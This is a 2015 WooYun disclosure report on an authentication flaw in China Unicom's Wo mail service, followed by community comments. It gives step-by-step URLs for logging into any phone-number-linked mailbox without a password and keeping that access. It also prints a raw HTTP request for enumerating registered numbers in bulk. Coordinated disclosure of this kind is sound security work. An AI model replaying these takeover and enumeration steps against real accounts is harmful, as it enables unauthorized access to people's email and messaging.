当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0103878

漏洞标题:中国联通沃任意邮箱账户登录(免密码永久控制沃通行证可发私信短信)

相关厂商:中国联通

漏洞作者: 管管侠

提交时间:2015-03-26 13:04

修复时间:2015-05-15 08:34

公开时间:2015-05-15 08:34

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-26: 细节已通知厂商并且等待厂商处理中
2015-03-31: 厂商已经确认,细节仅向厂商公开
2015-04-10: 细节向核心白帽子及相关领域专家公开
2015-04-20: 细节向普通白帽子公开
2015-04-30: 细节向实习白帽子公开
2015-05-15: 细节向公众公开

简要描述:

我哥是@撸撸侠!

详细说明:

复现流程:
1.首先手机号注册过邮箱
2.然后访问如下链接,找个注册过邮箱的手机号
http://mail.wo.cn/mail/register.action?actionType=editUserDetailInfo&user=185********

2.1.png


3.填写别名,只能设置一次,但是一般都不会设置,哈哈

1.png


4.确认后就跳转进去了

5.png


5.因为没有密码,是通过这个接口生成cookie跳转进来的

6.jpg


下面是达到永久控制的步骤
http://mail.wo.cn/mail/register.action?actionType=editUserDetailInfo&user=18600111138
继续改别名会提示,已经有别名了,无所谓,访问下面链接,其实是已经登录的
http://mail.wo.cn/welcome.action

1.png


2.png


0.png


2.png


漏洞证明:

6.可批量跑注册过邮箱的手机号了

1.png


爆破接口
POST /mail/register.action HTTP/1.1
Host: mail.wo.cn
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://mail.wo.cn/mail/register.action
Content-Length: 50
Cookie:
Connection: close
Pragma: no-cache
Cache-Control: no-cache
actionType=CheckUser&user=18600141111&domain=wo.cn
返回208是注册过邮箱的

1.png

修复方案:

版权声明:转载请注明来源 管管侠@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-03-31 08:32

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向中国联通集团公司通报.

最新状态:

暂无


漏洞评价:

评论

  1. 2015-03-26 13:11 | YY-2012 ( 普通白帽子 | Rank:2763 漏洞数:641 | 意淫,是《红楼梦》原创的词汇,但后来演变...)

    QTVA-2015-203813 ???

  2. 2015-03-26 14:00 | 咸鱼翻身 ( 普通白帽子 | Rank:576 漏洞数:108 )

    补天大牛搬家啦。。。。。

  3. 2015-03-26 15:06 | Ch丶0nly ( 普通白帽子 | Rank:205 漏洞数:50 | 专注网络30年。)

    已经举报双投的

  4. 2015-03-26 15:13 | Finger 认证白帽子 ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗,任何自称Finger并...)

    我就看看

  5. 2015-03-26 15:14 | 撸撸侠 ( 普通白帽子 | Rank:250 漏洞数:26 | 我是撸撸侠)

    管管 你又出来调皮了

  6. 2015-03-26 15:26 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    @撸撸侠 我靠 刚发现你们两个是撸管侠啊

  7. 2015-03-26 15:31 | Taro ( 普通白帽子 | Rank:178 漏洞数:48 | 走向最远的方向,哪怕前路迷茫;抱着最大的...)

    @疯狗 双投的节奏啊,https://butian.360.cn/vul/info/qid/QTVA-2015-203813

  8. 2015-03-26 15:38 | 管管侠 ( 核心白帽子 | Rank:1368 漏洞数:108 | 休息几日,让你们先装会!!!)

    没去过什么补天提交过吖,我只在wooyun撸

  9. 2015-03-26 15:38 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    @Taro 乌云上没有双投的概念啊 -- 纠结这个对漏洞本身和报告没啥意义吧……

  10. 2015-03-26 15:39 | 管管侠 ( 核心白帽子 | Rank:1368 漏洞数:108 | 休息几日,让你们先装会!!!)

    补天是啥

  11. 2015-03-26 15:40 | Taro ( 普通白帽子 | Rank:178 漏洞数:48 | 走向最远的方向,哪怕前路迷茫;抱着最大的...)

    @疯狗 确实漏洞本身比较有意义

  12. 2015-03-26 15:47 | 90Snake ( 普通白帽子 | Rank:109 漏洞数:42 | 最大的漏洞就是人)

    确实漏洞本身比较有意义

  13. 2015-03-26 15:52 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    漏洞更有价值

  14. 2015-03-26 16:02 | 李旭敏 ( 普通白帽子 | Rank:469 漏洞数:71 | ฏ๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎...)

    欢迎加入AAB家族·········

  15. 2015-03-26 16:24 | a6c ( 路人 | Rank:10 漏洞数:4 | ·̮̃·̃)

  16. 2015-03-26 16:30 | ki11y0u ( 普通白帽子 | Rank:104 漏洞数:23 | 好好学习,求带飞~~~~~~~~~~~~~~~~~~~~~~...)

    我靠 刚发现你们两个是撸管侠啊

  17. 2015-03-26 16:32 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    怎么说呢昂~~

  18. 2015-03-26 19:10 | hope ( 路人 | Rank:1 漏洞数:2 | 一个小菜)

    大牛 就是厉害

  19. 2015-03-26 19:30 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    乌云江湖涌现出好多侠客!奇葩的漏洞

  20. 2015-03-26 20:45 | Ton7BrEak ( 普通白帽子 | Rank:211 漏洞数:43 | 吃苦耐劳,我只会第一个!)

    @水晶 一边移动,一边联通。 等电信吧~

  21. 2015-03-26 21:10 | 1c3z ( 实习白帽子 | Rank:88 漏洞数:29 | 我读书少,你可别骗我!!!)

    妖兽!!!

  22. 2015-03-26 21:22 | 齐迹 ( 核心白帽子 | Rank:784 漏洞数:100 | 一名普通的phper开发者,关注web安全。)

    居然没闪电!

  23. 2015-03-26 21:27 | by灰客 ( 路人 | Rank:20 漏洞数:12 )

    电信呢?

  24. 2015-03-26 21:49 | M4sk ( 普通白帽子 | Rank:1199 漏洞数:319 | 国内信息安全任重而道远,还需要厂商和白帽...)

    我凑 我要换手机号 移动联通都不能用 电信可以不

  25. 2015-03-26 23:15 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    修完了

  26. 2015-03-27 05:08 | 秋风 ( 普通白帽子 | Rank:438 漏洞数:44 | 码农一枚,关注互联网安全)

    NB!

  27. 2015-03-30 10:16 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    再不确认就快公开了

  28. 2015-04-30 11:21 | 大物期末不能挂 ( 普通白帽子 | Rank:132 漏洞数:23 | 1.一个学渣,只求每门都不挂2.想把漏洞提...)

    不是向实习白帽子公开了么?怎么我还看不到?

  29. 2015-05-15 09:30 | 圣路西法 ( 路人 | Rank:4 漏洞数:3 | 围观大神ส็็็็็็ ̷̸̨̀͒̏̃ͦ...)

    一群大侠啊。

  30. 2015-05-15 09:51 | 北洋贱队 ( 普通白帽子 | Rank:252 漏洞数:25 )

    楼主发个手机号 我给你测试10010的短信网关

  31. 2015-05-19 10:48 | _Evil ( 普通白帽子 | Rank:418 漏洞数:59 | 万事无他,唯手熟尔。农民也会编程,别指望天...)

    @北洋贱队 @管管侠 我很欣赏你们